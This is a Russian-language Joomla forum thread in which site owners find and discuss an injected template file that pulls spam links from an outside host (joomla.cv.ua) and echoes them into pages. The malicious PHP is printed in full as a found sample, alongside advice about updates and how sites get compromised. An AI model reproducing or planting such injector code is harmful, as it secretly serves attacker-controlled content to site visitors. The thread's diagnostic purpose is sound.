Основной курс по Joomla
0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 727 Просмотров
*

LadaDed

  • Новичок
  • *
  • 8
  • 0
Чужие ссылки
« : 18.02.2016, 22:30:39 »
Поймал на сайте чужие ссылки.
Долго копал, не мог найти, откуда. Потом заметил, что у меня в разделе component перед жидоком стоит какой-то не понятный require_once
Он вызывает system.php (название -то какое!)
А там

Код: php
<?php
/* Это та самая блоха для Joomla, которую я поймал! */

$app=JFactory::getApplication();
$option5=$app->input->getCmd('option','');
$view5=$app->input->getCmd('view','');
$layout5=$app->input->getCmd('layout','');
$menu5=$app->getMenu();
$files = 'http://joomla.cv.ua/j32.txt';
$file_headers = @get_headers($files);
if(($menu5->getActive()==$menu5->getDefault())||($view5=='featured'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j07.txt");
$data = implode($content);
echo $data; }
if(($option5=='com_content')&&($view5=='category')&&($layout5!=='blog'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j08.txt");
$data = implode($content); echo $data; }
if(($option5=='com_content')&&($view5=='article'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j09.txt");
$data = implode($content); echo $data; }
if(($option5=='com_content')&&($layout5=='blog'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j10.txt");
$data = implode($content); echo $data; }
if (($option5=='com_content')&&($layout5=='default'))
if($file_headers[0] == 'HTTP/1.1 200 OK')
{ $content = file("http://joomla.cv.ua/j11.txt");
$data = implode($content); echo $data; }
?>

т.е. это какой-то Украинец, из Кабо Верде сидит и пишет текстовые файлы с такими вот пакостями, а они потом у меня появляются.
*

LadaDed

  • Новичок
  • *
  • 8
  • 0
Re: Чужие ссылки
« Ответ #2 : 18.02.2016, 23:13:57 »
Да это даже не ломали, а так просетапили. Версия 2.5 28
Там на хосте нельзя установить 3 - говорят, не хватит ресурса..
А меня позвали сайт делать, когда уже все было установлено и даже начато. Вот в шаблоне ict-novotela такая бяка.
Я то искал base64_decode даже sql прочесал. Ну, нету этих текстов и все! А они, оказывается, лежат вообще на другом адресе. Найдешь их, как-же!
*

dmitry_stas

  • Профи
  • ********
  • 9678
  • 932
Re: Чужие ссылки
« Ответ #3 : 18.02.2016, 23:19:44 »
если 2.5.28 с последними фиксами - то дыр в ней нет (скажем так пока не нашли :) ), так что обновляться на Ж3 не очень обязательно. ну по крайней мере из-за этой причины. соответственно, либо взломали до обновления, и прост о пока не проявляли себя, либо 2.5.28, но последние фиксы безопасности не установили. тогда 2.5.28 дырявая.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

LadaDed

  • Новичок
  • *
  • 8
  • 0
Re: Чужие ссылки
« Ответ #4 : 18.02.2016, 23:34:27 »
Да, надо будет там все обновить..
Я как-то привык на Амиро все делать, Дорого, конечно, но зато все такие штуки-дрюки не моя проблема.
Если что-то глючит - в службу поддержки и пускай они там и морочатся.
Но это были интернет-магазины, потом для ресторана делал, Там народ с деньгами, Сами говорят - не надо нам экономии, надо быстро и надежно.
А тут небольшой сайтик, практически, знакомые попросили.
А скупой платит дважды.
*

SeBun

  • Практически профи
  • *******
  • 3083
  • 187
  • @SeBun48
Re: Чужие ссылки
« Ответ #5 : 19.02.2016, 11:15:56 »
А скупой платит дважды.
Даже трижды.

Добавлю, что целевой взлом сайта делается крайне редко, сейчас это работает не так, как в лихих 90-х, сейчас программы ломают сайты тоннами. И ваш, скорее всего, не исключение. dmitry_stas правильно сказал, 2.5.28 вполне себе неплохая, но она редко используется в чистом виде. Обычно обвешана различными расширениями, через них и получают доступ.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят
*

dmitry_stas

  • Профи
  • ********
  • 9678
  • 932
Re: Чужие ссылки
« Ответ #6 : 19.02.2016, 12:39:41 »
та там даже без сторонних расширений может быть проблема. я имел в виду, что просто установленной 2.5.28 мало для уверенности в безопасности. там было еще 2 фикса безопасности выпущено, а версия не менялась при этом, потому что фиксы были выпущены когда поддержка 2.5 уже закончилась.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

natalyaegorova

  • Осваиваюсь на форуме
  • ***
  • 34
  • 0
Re: Чужие ссылки
« Ответ #7 : 03.08.2016, 02:55:15 »
Ребят, ради бога, подскажите что делать. Поймала на сайте такую же вредоносную фигню с Joomla.cv.ua!  Как от него избавиться? Сайт третьи сутки "висит"! Прописался в шаблоне в файле system.php. ДЖ версия 3.4.8.